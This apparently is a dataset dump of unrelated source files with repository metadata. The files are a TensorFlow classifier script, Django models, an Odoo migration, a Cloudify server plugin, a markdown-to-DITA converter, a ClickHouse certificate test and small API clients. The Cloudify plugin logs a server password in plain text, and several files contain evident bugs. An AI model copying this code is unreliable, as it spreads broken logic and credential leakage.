model.add(tf.keras.layers.Dense(Theta2.shape[0], activation='sigmoid', use_bias=True, kernel_initializer=tf.constant_initializer(Theta2[:,1:].T), bias_initializer=tf.constant_initializer(Theta2[:,0]))) # One doesn't even need the second sigmoid activation function because it is monotone increasing and doesn't change the ordering for argmax.
pred = model.predict(dataset)
elif option==1:
# input_shape=[X.shape[1]] could be left out below
layers = [tf.keras.layers.Dense(Theta1.shape[0], kernel_initializer=tf.constant_initializer(Theta1[:,1:].T), bias_initializer=tf.constant_initializer(Theta1[:,0]), activation='sigmoid', input_shape=[X.shape[1]]),
tf.keras.layers.Dense(Theta2.shape[0], kernel_initializer=tf.constant_initializer(Theta2[:,1:].T), bias_initializer=tf.constant_initializer(Theta2[:,0]), activation='sigmoid')] # One doesn't even need the second sigmoid activation function because it is monotone increasing and doesn't change the ordering for argmax.
# This doesn't work as tf.constant_initializer() doesn't take Tensors as input.
#layers = [tf.keras.layers.Dense(Theta1.shape[0], kernel_initializer= tf.constant_initializer(tf.transpose(Theta1[:,1:])), bias_initializer=tf.constant_initializer(Theta1[:,0]), activation='sigmoid'),
# tf.keras.layers.Dense(Theta2.shape[0], kernel_initializer= tf.constant_initializer(tf.transpose(Theta2[:,1:])), bias_initializer=tf.constant_initializer(Theta2[:,0]), activation='sigmoid')]
# This doesn't work: ValueError: Could not interpret initializer identifier: tf.Tensor(...)
#layers = [tf.keras.layers.Dense(Theta1.shape[0], kernel_initializer=tf.transpose(Theta1[:,1:]), bias_initializer=Theta1[:,0], activation='sigmoid'),
# tf.keras.layers.Dense(Theta2.shape[0], kernel_initializer=tf.transpose(Theta2[:,1:]), bias_initializer=Theta2[:,0], activation='sigmoid')]
model = tf.keras.Sequential(layers)
#model = tf.keras.models.Sequential(layers) # This is just an alias of previous.
#model.build() # not necessary
pred = model.predict(dataset)
elif option==6:
class NNModel(tf.keras.Model):
def __init__(self, Theta1, Theta2):
super(NNModel, self).__init__(name='neural_network_model')
self.dense_1 = tf.keras.layers.Dense(Theta1.shape[0], kernel_initializer=tf.constant_initializer(Theta1[:,1:].T), bias_initializer=tf.constant_initializer(Theta1[:,0]), activation='sigmoid', input_shape=[X.shape[1]])
self.dense_2 = tf.keras.layers.Dense(Theta2.shape[0], kernel_initializer=tf.constant_initializer(Theta2[:,1:].T), bias_initializer=tf.constant_initializer(Theta2[:,0]), activation='sigmoid')
def call(self, inputs):
# Define your forward pass here,
# using layers you previously defined (in `__init__`).
x = self.dense_1(inputs)
return self.dense_2(x)
model = NNModel(Theta1, Theta2)
pred = model.predict(dataset)
elif option in [2, 3, 4, 5]:
@tf.function
def evaluation(Theta1, Theta2, data):
# inside a @tf.function, I think all variables should be tf types, https://github.com/tensorflow/community/blob/master/rfcs/20180918-functions-not-sessions-20.md
# https://www.tensorflow.org/guide/effective_tf2#use_keras_layers_and_models_to_manage_variables
l1 = tf.sigmoid(tf.matmul(data, Theta1[1:,:]) + Theta1[0,:])
l2 = tf.sigmoid(tf.matmul(l1, Theta2[1:,:]) + Theta2[0,:])
#l2 = tf.matmul(l1, Theta2[1:,:]) + Theta2[0,:] # One doesn't even need the last sigmoid function because it is monotone increasing and doesn't change the ordering for argmax.
return l2
if option==2:
pred = []
for entry in dataset:
#pred.append(evaluation(tf.constant(Theta1.T), tf.constant(Theta2.T), entry.numpy().reshape((1,-1)))) # numpy reshape might be faster than tf.reshape
pred.append(evaluation(tf.constant(Theta1.T), tf.constant(Theta2.T), tf.reshape(entry, (1,-1)))) # doing it in TF
#pred = np.concatenate(pred, axis=0) # this also works
pred = tf.concat(pred, axis=0)
elif option==3:
pred = dataset.map(lambda x: evaluation(tf.constant(Theta1.T), tf.constant(Theta2.T), tf.reshape(x, [1,-1])))
#pred = dataset.map(lambda x: evaluation(tf.constant(Theta1.T), tf.constant(Theta2.T), x)) # This doesn't work.
pred = tf.concat([entry for entry in pred], axis=0)
elif option==4:
pred = []
for batch in dataset:
for entry in batch:
pred.append(evaluation(tf.constant(Theta1.T), tf.constant(Theta2.T), tf.reshape(entry, (1,-1))))
pred = tf.concat(pred, axis=0)
else: # option==5
pred = dataset.map(lambda x: evaluation(tf.constant(Theta1.T), tf.constant(Theta2.T), x))
#pred = dataset.map(lambda x: evaluation(tf.constant(Theta1.T), tf.constant(Theta2.T), tf.reshape(x, [-1,400]))) # This works, in same time.
pred = tf.concat([entry for entry in pred], axis=0)
else: # option==7
@tf.function
def evaluation2(Theta1k, Theta1b, Theta2k, Theta2b, data):
# inside a @tf.function, I think all variables should be tf types, https://github.com/tensorflow/community/blob/master/rfcs/20180918-functions-not-sessions-20.md
l1 = tf.sigmoid(tf.matmul(data, Theta1k) + Theta1b)
l2 = tf.sigmoid(tf.matmul(l1, Theta2k) + Theta2b)
#l2 = tf.matmul(l1, Theta2k) + Theta2b # One doesn't even need the last sigmoid function because it is monotone increasing and doesn't change the ordering for argmax.
return l2
pred = dataset.map(lambda x: evaluation2(tf.constant(Theta1[:,1:].T), tf.constant(Theta1[:,0]), tf.constant(Theta2[:,1:].T), tf.constant(Theta2[:,0].T), x))
#pred = dataset.map(lambda x: evaluation2(tf.constant(Theta1[:,1:].T), tf.constant(Theta1[:,0]), tf.constant(Theta2[:,1:].T), tf.constant(Theta2[:,0].T), tf.reshape(x, [-1,400]))) # This works, in same time.
pred = tf.concat([entry for entry in pred], axis=0)
# It does not work in this simplest form:
#pred = evaluation2(tf.constant(Theta1[:,1:].T), tf.constant(Theta1[:,0]), tf.constant(Theta2[:,1:].T), tf.constant(Theta2[:,0].T), dataset)
#tf.print(pred)
# The output layer (pred) has 10 units, for digits 1,2,...,9,0. After taking argmax, you have to map the result of argmax, 0,1,2,...,9 to the required 1,2,...,9,0.
pred_digit = (tf.argmax(pred, axis=1) + 1) % 10
#pred_digit = tf.map_fn(lambda x: (tf.argmax(x, axis=0, output_type=tf.int32)+1) % 10, pred, dtype=tf.int32) # This is rather slow!
pred_np = pred_digit.numpy().reshape(-1,1)
print('\nTraining Set Accuracy: {0:.2f}%.'.format(np.mean(pred_np == y) * 100))
print('Expected training error value on complete Training Set (approx.): 97.5%.')
print('\nTime elapsed: {:.2f} sec'.format(time.time() - start_time))
print()
if option in [0, 1, 6]:
tf.print(model.summary()) # This provides interesting output.
plt.scatter(np.arange(len(y)), y, label='Ground truth')
plt.scatter(np.arange(len(y)), pred_np, marker=".", c='r', label='Prediction')
plt.xlabel('Sample ID')
plt.ylabel('Digit')
plt.legend()
plt.show()
| 3.09375 | 3 |
instagram/models.py | kilonzijnr/instagram-clone | 0 | 10825 | <gh_stars>0
from django.db import models
from django.db.models.deletion import CASCADE
from django.contrib.auth.models import User
from cloudinary.models import CloudinaryField
# Create your models here.
class Profile(models.Model):
"""Model for handling User Profile"""
user = models.OneToOneField(User, on_delete= models.CASCADE)
username = models.CharField(max_length = 25)
signup_date = models.DateTimeField(auto_now_add= True)
profile_photo = CloudinaryField('images')
followers = models.ManyToManyField(User, related_name='followers', blank= True)
bio = models.CharField(max_length= 70)
def __str__(self):
return self.name
def total_followers(self):
"""Method to return total numberof followers"""
return self.followers.count()
def save_profile(self):
"""Method to save profile to the database"""
self.save()
def delete_profile(self):
"""Method to delete profile from the database"""
self.delete()
def update_profile(self,new):
"""Method to update user profile
Args:
new([type]): [description]
"""
self.username = new.username
self.bio = new.bio
self.profile_photo = new.profile_pic
self.save()
@classmethod
def get_following(cls,user):
"""Method to return all users a specific user is following """
following = user.followers.all()
users = []
for profile in following:
user = User.objects.get(profile = profile)
users.append(user)
return users
@classmethod
def search_profile(cls,search_term):
"""Method to return profiles with a provided search term"""
profiles = cls.objects.filter(username_icontains = search_term)
return profiles
class Likes(models.Model):
"""Model for handling Image likes"""
likes = models.IntegerField(default=0)
class Image(models.Model):
"""Model for handling Image posts by users"""
user = models.ForeignKey(User,on_delete= models.CASCADE)
image = CloudinaryField('images')
image_name = models.CharField(max_length= 25)
caption = models.CharField(max_length= 100)
profile = models.ForeignKey(Profile, on_delete=models.CASCADE, default= None)
likes = models.ForeignKey(Likes, on_delete=CASCADE, default=None)
comment = models.CharField(max_length= 120)
time_posted = models.DateTimeField(auto_now_add= True)
def __str__(self):
return self.name
def save_image(self):
"""Method to save Image to Database"""
self.save()
def delete_image(self):
"""Method to delete Image """
self.delete()
def like_image(self,user):
"""Method to add user as an image liker"""
self.likes.add(user)
def get_total_likes(self):
"""Method to get the total number of likess on an Image"""
return self.likes.count()
def update_caption(self,caption):
"""Method to updat eimage captions in database"""
self.caption = caption
self.save()
@classmethod
def get_images(cls,users):
"""Method to get a specific image"""
posts = []
for user in users:
images = Image.objects.filter(user = user)
for image in images:
posts.append(image)
return posts
def get_comments(self):
"""Method to get all comments related to a post"""
comments = Comments.objects.filter(image = self)
return comments
class Comments(models.Model):
"""Method to define attributes of a comment"""
user = models.ForeignKey(User, on_delete=models.CASCADE)
image = models.ForeignKey(Image,on_delete=models.CASCADE)
comment = models.TextField()
def __str__(self):
return self.comment
| 2.578125 | 3 |
addons/purchase_request/migrations/13.0.4.0.0/post-migration.py | jerryxu4j/odoo-docker-build | 0 | 10826 | <filename>addons/purchase_request/migrations/13.0.4.0.0/post-migration.py
from odoo import SUPERUSER_ID, api
from odoo.tools.sql import column_exists
def migrate(cr, version=None):
env = api.Environment(cr, SUPERUSER_ID, {})
if column_exists(cr, "product_template", "purchase_request"):
_migrate_purchase_request_to_property(env)
def _migrate_purchase_request_to_property(env):
"""Create properties for all products with the flag set on all companies"""
env.cr.execute("select id, coalesce(purchase_request, False) from product_template")
values = dict(env.cr.fetchall())
for company in env["res.company"].with_context(active_test=False).search([]):
env["ir.property"].with_context(force_company=company.id).set_multi(
"purchase_request", "product.template", values, False,
)
env.cr.execute("alter table product_template drop column purchase_request")
| 2 | 2 |
cfy/server.py | buhanec/cloudify-flexiant-plugin | 0 | 10827 | # coding=UTF-8
"""Server stuff."""
from __future__ import print_function
from cfy import (create_server,
create_ssh_key,
attach_ssh_key,
wait_for_state,
wait_for_cond,
create_nic,
attach_nic,
get_resource,
get_server_status,
start_server,
stop_server,
delete_resource)
import socket
import errno
from cloudify import ctx
from cloudify.decorators import operation
from cloudify.exceptions import NonRecoverableError
from cfy.helpers import (with_fco_api, with_exceptions_handled)
from resttypes import enums, cobjects
from paramiko import SSHClient, AutoAddPolicy
import spur
import spur.ssh
from time import sleep
from subprocess import call
from fabric.api import settings, run
import os
RT = enums.ResourceType
PROP_RESOURCE_ID = 'resource_id'
PROP_USE_EXISTING = 'use_existing'
PROP_IMAGE = 'image'
PROP_VDC = 'vdc'
PROP_NET = 'network'
PROP_SERVER_PO = 'server_type'
PROP_CPU_COUNT = 'cpu_count'
PROP_RAM_AMOUNT = 'ram_amount'
PROP_MANAGER_KEY = 'manager_key'
PROP_PRIVATE_KEYS = 'private_keys'
PROP_PUBLIC_KEYS = 'public_keys'
RPROP_UUID = 'uuid'
RPROP_DISKS = 'disks'
RPROP_NIC = 'nic'
RPROP_NICS = 'nics'
RPROP_IP = 'ip'
RPROP_USER = 'username'
RPROP_PASS = 'password'
@operation
@with_fco_api
@with_exceptions_handled
def create(fco_api, *args, **kwargs):
ctx.logger.info('starting server creation')
# Ease of access
_rp = ctx.instance.runtime_properties
_np = ctx.node.properties
# Check if existing server is to be used
if _np[PROP_USE_EXISTING]:
server = get_resource(fco_api, _np[PROP_RESOURCE_ID, RT.SERVER])
if not server.nics:
raise Exception('No NICs attached to server')
_rp[RPROP_UUID] = server.resourceUUID
_rp[RPROP_DISKS] = [d.resourceUUID for d in server.disks]
_rp[RPROP_NIC] = server.nics[0].resourceUUID
_rp[RPROP_NICS] = [n.resourceUUID for n in server.nics]
_rp[RPROP_IP] = server.nics[0].ipAddresses[0].ipAddress
_rp[RPROP_USER] = server.initialUser
_rp[RPROP_PASS] = server.initialPassword
return (_rp[RPROP_UUID], _rp[RPROP_IP], _rp[RPROP_USER],
_rp[RPROP_PASS])
# Get configuration
image = get_resource(fco_api, _np[PROP_IMAGE], RT.IMAGE)
if _np[PROP_IMAGE]:
vdc = get_resource(fco_api, _np[PROP_VDC], RT.VDC)
else:
vdc = None
network = get_resource(fco_api, _np[PROP_NET], RT.NETWORK)
server_po = get_resource(fco_api, _np[PROP_SERVER_PO], RT.PRODUCTOFFER)
manager_key = get_resource(fco_api, _np[PROP_MANAGER_KEY], RT.SSHKEY)
cpu_count = _np[PROP_CPU_COUNT]
ram_amount = _np[PROP_RAM_AMOUNT]
public_keys = _np[PROP_PUBLIC_KEYS] or []
private_keys = _np[PROP_PRIVATE_KEYS] or []
# Verify existence of private keys
missing_keys = set()
bad_permission_keys = set()
key_contents = {}
for key in private_keys:
try:
key_contents[key] = ctx.get_resource(os.path.expanduser(key))
except NonRecoverableError as e:
if 'HttpException: 404' in str(e):
missing_keys.add(key)
elif 'HttpException: 403' in str(e):
bad_permission_keys.add(key)
else:
raise
if missing_keys or bad_permission_keys:
raise Exception('Missing private keys: {}\nBad permission keys: {}'
.format(missing_keys, bad_permission_keys))
# Generate missing configuration
image_uuid = image.resourceUUID
if vdc is not None:
cluster_uuid = vdc.clusterUUID
vdc_uuid = vdc.resourceUUID
else:
cluster_uuid = image.clusterUUID
vdc_uuid = image.vdcUUID
network_uuid = network.resourceUUID
network_type = network.networkType
server_po_uuid = server_po.resourceUUID
manager_key_uuid = manager_key.resourceUUID
# TODO: better way of determining suitable disk
boot_disk_po_uuid = get_resource(fco_api,
'{} GB Storage Disk'.format(image.size),
RT.PRODUCTOFFER).resourceUUID
ctx.logger.info('Configuration: \n'
'image_uuid: %s\n'
'cluster_uuid: %s\n'
'vdc_uuid: %s\n'
'network_uuid: %s\n'
'server_po_uuid: %s\n'
'manager_key_uuid: %s\n'
'boot_disk_po_uuid: %s',
image_uuid, cluster_uuid, vdc_uuid, network_uuid,
server_po_uuid, manager_key_uuid, boot_disk_po_uuid)
# Create server
server_name = '{}{}_{}'.format(ctx.bootstrap_context.resources_prefix,
ctx.deployment.id, ctx.instance.id)
try:
server_uuid = _rp[RPROP_UUID]
except KeyError:
# key_obj = get_resource(fco_api, key_uuid, RT.SSHKEY)
# keys = SSHKey.REQUIRED_ATTRIBS.copy()
# keys.add('resourceUUID')
# submit_key = {}
# for k in keys:
# try:
# submit_key[k] = getattr(manager_key, k)
# except AttributeError:
# submit_key[k] = None
server_uuid = create_server(fco_api, server_po_uuid, image_uuid,
cluster_uuid, vdc_uuid, cpu_count,
ram_amount, boot_disk_po_uuid,
[manager_key], server_name)
_rp[RPROP_UUID] = server_uuid
ctx.logger.info('server_uuid: %s', server_uuid)
server = get_resource(fco_api, server_uuid, RT.SERVER)
server_nics = [nic.resourceUUID for nic in server.nics]
server_keys = [key.resourceUUID for key in server.sshkeys]
# Wait for server to be active
if not wait_for_state(fco_api, server_uuid, enums.ResourceState.ACTIVE,
RT.SERVER):
raise Exception('Server failed to prepare in time!')
ctx.logger.info('Server ACTIVE')
# Add keys
new_keys = set()
for key in public_keys:
if key not in server_keys:
key_uuid = create_ssh_key(fco_api, key, server_name + ' Key')
attach_ssh_key(fco_api, server_uuid, key_uuid)
new_keys.add(key_uuid)
ctx.logger.info('Keys attached: %s', new_keys)
# Create NIC
try:
nic_uuid = _rp[RPROP_NIC]
except KeyError:
nic_uuid = create_nic(fco_api, cluster_uuid, network_type,
network_uuid, vdc_uuid, server_name + ' NIC')
if not wait_for_state(fco_api, nic_uuid, enums.ResourceState.ACTIVE,
RT.NIC):
raise Exception('NIC failed to create in time!')
_rp[RPROP_NIC] = nic_uuid
ctx.logger.info('nic_uuid: %s', nic_uuid)
# Stop server if started
if get_server_status(fco_api, server_uuid) != enums.ServerStatus.STOPPED:
if not stop_server(fco_api, server_uuid):
raise Exception('Stopping server failed to complete in time!')
ctx.logger.info('Server STOPPED')
# Attach NIC
if nic_uuid not in server_nics:
job_uuid = attach_nic(fco_api, server_uuid, nic_uuid, 1).resourceUUID
cond = cobjects.Job.status == enums.JobStatus.SUCCESSFUL
if not wait_for_cond(fco_api, job_uuid, cond, RT.JOB):
raise Exception('Attaching NIC failed to complete in time!')
ctx.logger.info('NICs attached')
else:
ctx.logger.info('NICs already attached')
# Start server if not started
if get_server_status(fco_api, server_uuid) == enums.ServerStatus.STOPPED:
if not start_server(fco_api, server_uuid):
raise Exception('Running server failed to complete in time!')
ctx.logger.info('Server RUNNING')
nic = get_resource(fco_api, nic_uuid, RT.NIC)
server_ip = nic.ipAddresses[0].ipAddress
server_port = 22
ctx.logger.info('Server READY')
username = server.initialUser
password = <PASSWORD>
ssh_attempts = -1
ssh_delay = 3
# Fabric test
while ssh_attempts:
ctx.logger.info('Attempting to SSH ({})'.format(ssh_attempts))
try:
with settings(host_string=server_po_uuid, user=username,
password=password, disable_known_hosts=True,
abort_exception=Exception):
run('mkdir ~/.ssh')
run('chmod 0700 ~/.ssh')
for key, key_content in key_contents.items():
remote = os.path.join('~', '.ssh', os.path.basename(key))
run('echo \'{}\' > {}'.format(key_content, remote))
run('chmod 0600 ' + remote)
ctx.logger.info('Done')
break
except Exception as e:
ctx.logger.info(e)
ssh_attempts -= 1
else:
raise Exception('Failed to provision keys in time')
# # Spur test
# while ssh_attempts:
# ctx.logger.info('Attempting to SSH ({})'.format(ssh_attempts))
# shell = spur.SshShell(
# hostname=server_ip,
# port=server_port,
# username=username,
# password=password,
# shell_type=spur.ssh.ShellTypes.minimal,
# missing_host_key=spur.ssh.MissingHostKey.accept
# )
# with shell:
# try:
# ctx.logger.info('Creating & chmoding .ssh')
# shell.run(['mkdir', '~/.ssh'])
# shell.run(['chmod', '0700', '~/.ssh'])
# for key, key_content in key_contents.items():
# ctx.logger.info('Adding private key: ' + remote)
# remote = os.path.join('~', '.ssh', os.path.basename(key))
# shell.run(['echo', "'{}'".format(key_content), '>',
# remote])
# shell.run(['chmod', '0600', remote])
# except spur.ssh.ConnectionError as e:
# if e.original_error[0] not in {errno.ECONNREFUSED,
# errno.EHOSTUNREACH}:
# raise
# sleep(ssh_delay)
# ssh_attempts -= 1
# else:
# raise Exception('Failed to provision keys in time')
# # Provision private keys
# ssh = SSHClient()
# call(['ssh-keygen', '-R', server_ip])
# ssh.set_missing_host_key_policy(AutoAddPolicy())
#
# while ssh_attempts:
# try:
# ctx.logger.info('Attempting to SSH ({})'.format(ssh_attempts))
# ctx.logger.info('SSH Connection details: {}'.format(
# ((server_ip, server_port, username, password, ssh_delay))))
# ssh.connect(server_ip, server_port, username, password,
# timeout=ssh_delay, look_for_keys=False)
# ctx.logger.info('SSH connection established')
# break
# except socket.timeout:
# ssh_attempts -= 1
# except socket.error as e:
# if e[0] not in {errno.ECONNREFUSED, errno.EHOSTUNREACH}:
# ctx.logger.info('SSH connection failed: %s', e[0])
# raise
# sleep(ssh_delay)
# ssh_attempts -= 1
# else:
# raise Exception('Failed to provision keys in time')
# ssh.exec_command('mkdir ~/.ssh')
# ssh.exec_command('chmod 0700 ~/.ssh')
# for key, key_content in key_contents.items():
# remote = os.path.join('~', '.ssh', os.path.basename(key))
# ssh.exec_command('echo \'{}\' > {}'.format(key_content, remote))
# ssh.exec_command('chmod 0600 ' + remote)
_rp[RPROP_UUID] = server_uuid
_rp[RPROP_IP] = server_ip
_rp[RPROP_USER] = username
_rp[RPROP_PASS] = password
server = get_resource(fco_api, server_uuid, RT.SERVER)
_rp[RPROP_DISKS] = [d.resourceUUID for d in server.disks]
_rp[RPROP_NICS] = [n.resourceUUID for n in server.nics]
ctx.logger.info('Server IP: ' + server_ip)
ctx.logger.info('Server User: ' + username)
ctx.logger.info('Server Password: ' + password)
return server_uuid, server_ip, username, password
@operation
@with_fco_api
@with_exceptions_handled
def delete(fco_api, *args, **kwargs):
server_uuid = ctx.instance.runtime_properties.get(RPROP_UUID)
job_uuid = delete_resource(fco_api, server_uuid, RT.SERVER, True) \
.resourceUUID
cond = cobjects.Job.status == enums.JobStatus.SUCCESSFUL
if not wait_for_cond(fco_api, job_uuid, cond, RT.JOB):
raise Exception('Failed to delete server')
@operation
@with_fco_api
@with_exceptions_handled
def start(fco_api, *args, **kwargs):
server_uuid = ctx.instance.runtime_properties.get(RPROP_UUID)
if get_server_status(fco_api, server_uuid) != enums.ServerStatus.RUNNING:
if not start_server(fco_api, server_uuid):
raise Exception('Could not start server!')
@operation
@with_fco_api
@with_exceptions_handled
def stop(fco_api, *args, **kwargs):
server_uuid = ctx.instance.runtime_properties.get(RPROP_UUID)
if get_server_status(fco_api, server_uuid) != enums.ServerStatus.STOPPED:
if not stop_server(fco_api, server_uuid):
raise Exception('Could not stop server!')
@operation
@with_fco_api
@with_exceptions_handled
def creation_validation(fco_api, *args, **kwargs):
server_uuid = ctx.instance.runtime_properties.get(RPROP_UUID)
try:
get_resource(fco_api, server_uuid, RT.SERVER)
except Exception:
return False
return True
| 1.890625 | 2 |
markdown2dita.py | mattcarabine/markdown2dita | 6 | 10828 | # coding: utf-8
"""
markdown2dita
~~~~~~~~~~~~~
A markdown to dita-ot conversion tool written in pure python.
Uses mistune to parse the markdown.
"""
from __future__ import print_function
import argparse
import sys
import mistune
__version__ = '0.3'
__author__ = '<NAME> <<EMAIL>>'
__all__ = ['Renderer', 'Markdown', 'markdown', 'escape']
class Renderer(mistune.Renderer):
def codespan(self, text):
return '<codeph>{0}</codeph>'.format(escape(text.rstrip()))
def link(self, link, title, content):
return '<xref href="{0}">{1}</xref>'.format(link, escape(content or title))
def block_code(self, code, language=None):
code = escape(code.rstrip('\n'))
if language:
return ('<codeblock outputclass="language-{0}">{1}</codeblock>'
.format(language, code))
else:
return '<codeblock>{0}</codeblock>'.format(code)
def block_quote(self, text):
return '<codeblock>{0}</codeblock>'.format(text)
def header(self, text, level, raw=None):
# Dita only supports one title per section
title_level = self.options.get('title_level', 2)
if level <= title_level:
return '</section><section><title>{0}</title>'.format(text)
else:
return '<p><b>{0}</b></p>'.format(text)
def double_emphasis(self, text):
return '<b>{0}</b>'.format(text)
def emphasis(self, text):
return '<i>{0}</i>'.format(text)
def hrule(self):
# Dita has no horizontal rule, ignore it
# could maybe divide sections?
return ''
def inline_html(self, text):
# Dita does not support inline html, just pass it through
return text
def list_item(self, text):
return '<li>{0}</li>'.format(text)
def list(self, body, ordered=True):
if ordered:
return '<ol>{0}</ol>'.format(body)
else:
return '<ul>{0}</ul>'.format(body)
def image(self, src, title, text):
# Derived from the mistune library source code
src = mistune.escape_link(src)
text = escape(text, quote=True)
if title:
title = escape(title, quote=True)
output = ('<fig><title>{0}</title>\n'
'<image href="{1}" alt="{2}"/></fig>'
.format(title, src, text))
else:
output = '<image href="{0}" alt="{1}"/>'.format(src, text)
return output
def table(self, header, body, cols):
col_string = ['<colspec colname="col{0}"/>'.format(x+1)
for x in range(cols)]
output_str = ('<table>\n<tgroup cols="{0}">\n{1}\n'
.format(cols, '\n'.join(col_string)))
return (output_str + '<thead>\n' + header + '</thead>\n<tbody>\n' +
body + '</tbody>\n</tgroup>\n</table>')
def table_row(self, content):
return '<row>\n{0}</row>\n'.format(content)
def table_cell(self, content, **flags):
align = flags['align']
if align:
return '<entry align="{0}">{1}</entry>\n'.format(align, content)
else:
return '<entry>{0}</entry>\n'.format(content)
def autolink(self, link, is_email=False):
text = link = escape(link)
if is_email:
link = 'mailto:{0}'.format(link)
return '<xref href="{0}">{1}</xref>'.format(link, text)
def footnote_ref(self, key, index):
return ''
def footnote_item(self, key, text):
return ''
def footnotes(self, text):
return ''
def strikethrough(self, text):
return text
class Markdown(mistune.Markdown):
def __init__(self, renderer=None, inline=None, block=None, **kwargs):
if not renderer:
renderer = Renderer(**kwargs)
else:
kwargs.update(renderer.options)
super(Markdown, self).__init__(
renderer=renderer, inline=inline, block=block)
def parse(self, text, page_id='enter-id-here',
title='Enter the page title here'):
output = super(Markdown, self).parse(text)
if output.startswith('</section>'):
output = output[9:]
else:
output = '<section>\n' + output
output = """<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE concept PUBLIC "-//OASIS//DTD DITA Concept//EN" "concept.dtd">
<concept xml:lang="en-us" id="{0}">
<title>{1}</title>
<shortdesc>Enter the short description for this page here</shortdesc>
<conbody>
{2}</section>
</conbody>
</concept>""".format(page_id, title, output)
return output
def output_table(self):
# Derived from the mistune library source code
aligns = self.token['align']
aligns_length = len(aligns)
cell = self.renderer.placeholder()
# header part
header = self.renderer.placeholder()
cols = len(self.token['header'])
for i, value in enumerate(self.token['header']):
align = aligns[i] if i < aligns_length else None
flags = {'header': True, 'align': align}
cell += self.renderer.table_cell(self.inline(value), **flags)
header += self.renderer.table_row(cell)
# body part
body = self.renderer.placeholder()
for i, row in enumerate(self.token['cells']):
cell = self.renderer.placeholder()
for j, value in enumerate(row):
align = aligns[j] if j < aligns_length else None
flags = {'header': False, 'align': align}
cell += self.renderer.table_cell(self.inline(value), **flags)
body += self.renderer.table_row(cell)
return self.renderer.table(header, body, cols)
def escape(text, quote=False, smart_amp=True):
return mistune.escape(text, quote=quote, smart_amp=smart_amp)
def _parse_args(args):
parser = argparse.ArgumentParser(description='markdown2dita - a markdown '
'to dita-ot CLI conversion tool.')
parser.add_argument('-i', '--input-file',
help='input markdown file to be converted.'
'If omitted, input is taken from stdin.')
parser.add_argument('-o', '--output-file',
help='output file for the converted dita content.'
'If omitted, output is sent to stdout.')
return parser.parse_args(args)
def markdown(text, escape=True, **kwargs):
return Markdown(escape=escape, **kwargs)(text)
def main():
parsed_args = _parse_args(sys.argv[1:])
if parsed_args.input_file:
input_str = open(parsed_args.input_file, 'r').read()
elif not sys.stdin.isatty():
input_str = ''.join(line for line in sys.stdin)
else:
print('No input file specified and unable to read input on stdin.\n'
"Use the '-h' or '--help' flag to see usage information",
file=sys.stderr)
exit(1)
markdown = Markdown()
dita_output = markdown(input_str)
if parsed_args.output_file:
with open(parsed_args.output_file, 'w') as output_file:
output_file.write(dita_output)
else:
print(dita_output)
if __name__ == '__main__':
main()
| 2.96875 | 3 |
tests/integration/test_reload_certificate/test.py | roanhe-ts/ClickHouse | 1 | 10829 | <gh_stars>1-10
import pytest
import os
from helpers.cluster import ClickHouseCluster
SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))
cluster = ClickHouseCluster(__file__)
node = cluster.add_instance('node', main_configs=["configs/first.crt", "configs/first.key",
"configs/second.crt", "configs/second.key",
"configs/cert.xml"])
@pytest.fixture(scope="module", autouse=True)
def started_cluster():
try:
cluster.start()
yield cluster
finally:
cluster.shutdown()
def change_config_to_key(name):
'''
* Generate config with certificate/key name from args.
* Reload config.
'''
node.exec_in_container(["bash", "-c" , """cat > /etc/clickhouse-server/config.d/cert.xml << EOF
<?xml version="1.0"?>
<clickhouse>
<https_port>8443</https_port>
<openSSL>
<server>
<certificateFile>/etc/clickhouse-server/config.d/{cur_name}.crt</certificateFile>
<privateKeyFile>/etc/clickhouse-server/config.d/{cur_name}.key</privateKeyFile>
<loadDefaultCAFile>true</loadDefaultCAFile>
<cacheSessions>true</cacheSessions>
<disableProtocols>sslv2,sslv3</disableProtocols>
<preferServerCiphers>true</preferServerCiphers>
</server>
</openSSL>
</clickhouse>
EOF""".format(cur_name=name)])
node.query("SYSTEM RELOAD CONFIG")
def test_first_than_second_cert():
''' Consistently set first key and check that only it will be accepted, then repeat same for second key. '''
# Set first key
change_config_to_key('first')
# Command with correct certificate
assert node.exec_in_container(['curl', '--silent', '--cacert', '/etc/clickhouse-server/config.d/{cur_name}.crt'.format(cur_name='first'),
'https://localhost:8443/']) == 'Ok.\n'
# Command with wrong certificate
# This command don't use option '-k', so it will lead to error while execution.
# That's why except will always work
try:
node.exec_in_container(['curl', '--silent', '--cacert', '/etc/clickhouse-server/config.d/{cur_name}.crt'.format(cur_name='second'),
'https://localhost:8443/'])
assert False
except:
assert True
# Change to other key
change_config_to_key('second')
# Command with correct certificate
assert node.exec_in_container(['curl', '--silent', '--cacert', '/etc/clickhouse-server/config.d/{cur_name}.crt'.format(cur_name='second'),
'https://localhost:8443/']) == 'Ok.\n'
# Command with wrong certificate
# Same as previous
try:
node.exec_in_container(['curl', '--silent', '--cacert', '/etc/clickhouse-server/config.d/{cur_name}.crt'.format(cur_name='first'),
'https://localhost:8443/'])
assert False
except:
assert True
| 2.109375 | 2 |
examples/python/fling.py | arminfriedl/fling | 0 | 10830 | <filename>examples/python/fling.py
import flingclient as fc
from flingclient.rest import ApiException
from datetime import datetime
# Per default the dockerized fling service runs on localhost:3000 In case you
# run your own instance, change the base url
configuration = fc.Configuration(host="http://localhost:3000")
# Every call, with the exception of `/api/auth`, is has to be authorized by a
# bearer token. Get a token by authenticating as admin and set it into the
# configuration. All subsequent calls will send this token in the header as
# `Authorization: Bearer <token> header`
def authenticate(admin_user, admin_password):
with fc.ApiClient(configuration) as api_client:
auth_client = fc.AuthApi(api_client)
admin_auth = fc.AdminAuth(admin_user, admin_password)
configuration.access_token = auth_client.authenticate_owner(admin_auth=admin_auth)
admin_user = input("Username: ")
admin_password = input("Password: ")
authenticate(admin_user, admin_password)
with fc.ApiClient(configuration) as api_client:
# Create a new fling
fling_client = fc.FlingApi(api_client)
fling = fc.Fling(name="A Fling from Python", auth_code="secret",
direct_download=False, allow_upload=True,
expiration_time=datetime(2099, 12, 12))
fling = fling_client.post_fling()
print(f"Created a new fling: {fling}")
#
| 2.921875 | 3 |
pretraining/python/download_tensorboard_logs.py | dl4nlp-rg/PTT5 | 51 | 10831 | <filename>pretraining/python/download_tensorboard_logs.py
import tensorflow.compat.v1 as tf
import os
import tqdm
GCS_BUCKET = 'gs://ptt5-1'
TENSORBOARD_LOGS_LOCAL = '../logs_tensorboard'
os.makedirs(TENSORBOARD_LOGS_LOCAL, exist_ok=True)
# where to look for events files - experiment names
base_paths = [
# Main initial experiments - all weights are updated
'small_standard_vocab',
'base_standard_vocab',
